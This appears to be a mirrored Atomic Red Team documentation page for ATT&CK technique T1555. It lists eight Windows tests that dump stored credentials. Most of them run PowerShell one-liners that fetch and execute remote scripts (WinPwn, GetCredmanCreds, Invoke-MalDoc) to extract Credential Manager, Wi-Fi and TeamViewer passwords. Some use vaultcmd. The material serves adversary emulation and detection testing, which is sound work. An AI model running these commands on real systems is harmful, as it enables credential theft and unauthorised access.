security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1555/T1555.md
T
Atomic Red Team doc generator 5ede8f21e4 Generated docs from job=generate-docs branch=master [ci skip]
2025-02-13 22:03:40 +00:00

281 lines
7.2 KiB
Markdown
Raw Permalink Blame History

# T1555 - Credentials from Password Stores
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1555)
<blockquote>
Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba)
- [Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]](#atomic-test-2---dump-credentials-from-windows-credential-manager-with-powershell-windows-credentials)
- [Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]](#atomic-test-3---dump-credentials-from-windows-credential-manager-with-powershell-web-credentials)
- [Atomic Test #4 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]](#atomic-test-4---enumerate-credentials-from-windows-credential-manager-using-vaultcmdexe-windows-credentials)
- [Atomic Test #5 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]](#atomic-test-5---enumerate-credentials-from-windows-credential-manager-using-vaultcmdexe-web-credentials)
- [Atomic Test #6 - WinPwn - Loot local Credentials - lazagne](#atomic-test-6---winpwn---loot-local-credentials---lazagne)
- [Atomic Test #7 - WinPwn - Loot local Credentials - Wifi Credentials](#atomic-test-7---winpwn---loot-local-credentials---wifi-credentials)
- [Atomic Test #8 - WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords](#atomic-test-8---winpwn---loot-local-credentials---decrypt-teamviewer-passwords)
<br/>
## Atomic Test #1 - Extract Windows Credential Manager via VBA
This module will extract the credentials found within the Windows credential manager and dump
them to $env:TEMP\windows-credentials.txt
**Supported Platforms:** Windows
**auto_generated_guid:** 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
```
#### Cleanup Commands:
```powershell
Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft Word must be installed
##### Check Prereq Commands:
```powershell
try {
New-Object -COMObject "word.Application" | Out-Null
$process = "winword"
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
```
<br/>
<br/>
## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
This module will extract the credentials from Windows Credential Manager
**Supported Platforms:** Windows
**auto_generated_guid:** c89becbe-1758-4e7d-a0f4-97d2188a23e3
#### Attack Commands: Run with `powershell`!
```powershell
IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force
```
<br/>
<br/>
## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
This module will extract the credentials from Windows Credential Manager
**Supported Platforms:** Windows
**auto_generated_guid:** 8fd5a296-6772-4766-9991-ff4e92af7240
#### Attack Commands: Run with `powershell`!
```powershell
IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
```
<br/>
<br/>
## Atomic Test #4 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]
This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
**Supported Platforms:** Windows
**auto_generated_guid:** 36753ded-e5c4-4eb5-bc3c-e8fba236878d
#### Attack Commands: Run with `powershell`!
```powershell
vaultcmd /listcreds:"Windows Credentials" /all
```
<br/>
<br/>
## Atomic Test #5 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]
This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
**Supported Platforms:** Windows
**auto_generated_guid:** bc071188-459f-44d5-901a-f8f2625b2d2e
#### Attack Commands: Run with `powershell`!
```powershell
vaultcmd /listcreds:"Web Credentials" /all
```
<br/>
<br/>
## Atomic Test #6 - WinPwn - Loot local Credentials - lazagne
The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer.
Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.).
This tool has been developed for the purpose of finding these passwords for the most commonly-used software
**Supported Platforms:** Windows
**auto_generated_guid:** 079ee2e9-6f16-47ca-a635-14efcd994118
#### Attack Commands: Run with `powershell`!
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
lazagnemodule -consoleoutput -noninteractive
```
<br/>
<br/>
## Atomic Test #7 - WinPwn - Loot local Credentials - Wifi Credentials
Loot local Credentials - Wifi Credentials technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** afe369c2-b42e-447f-98a3-fb1f4e2b8552
#### Attack Commands: Run with `powershell`!
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
wificreds -consoleoutput -noninteractive
```
<br/>
<br/>
## Atomic Test #8 - WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** db965264-3117-4bad-b7b7-2523b7856b92
#### Attack Commands: Run with `powershell`!
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
decryptteamviewer -consoleoutput -noninteractive
```
<br/>
Reference in New Issue View Git Blame Copy Permalink